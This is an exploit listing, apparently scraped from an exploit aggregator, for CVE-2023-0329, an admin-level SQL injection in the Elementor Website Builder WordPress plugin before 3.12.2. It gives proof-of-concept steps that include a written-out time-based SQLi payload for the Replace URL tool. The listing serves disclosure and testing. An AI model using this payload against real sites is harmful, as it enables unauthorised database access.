Exploit for Elementor Website Builder < 3.12.2 - Admin+ SQLi CVE-2023-0329

Name: Exploit for Elementor Website Builder < 3.12.2 - Admin+ SQLi CVE-2023-0329
Rating: 5 (518 reviews)

2023-05-02 | CVSS 5.8

## https://sploitus.com/exploit?id=WPEX-ID:A875836D-77F4-4306-B275-2B60EFFF1493
1. Go to Elementor > Tools > Replace URL
2. Fill the first field with `http://localhost:8000/`
3. Fill the second field with `http://localhost:8000/?test'),meta_key='key4'where+meta_id=SLEEP(2);#`
4. Note the additional time taken by the request, demonstrating the SQL injection vulnerability.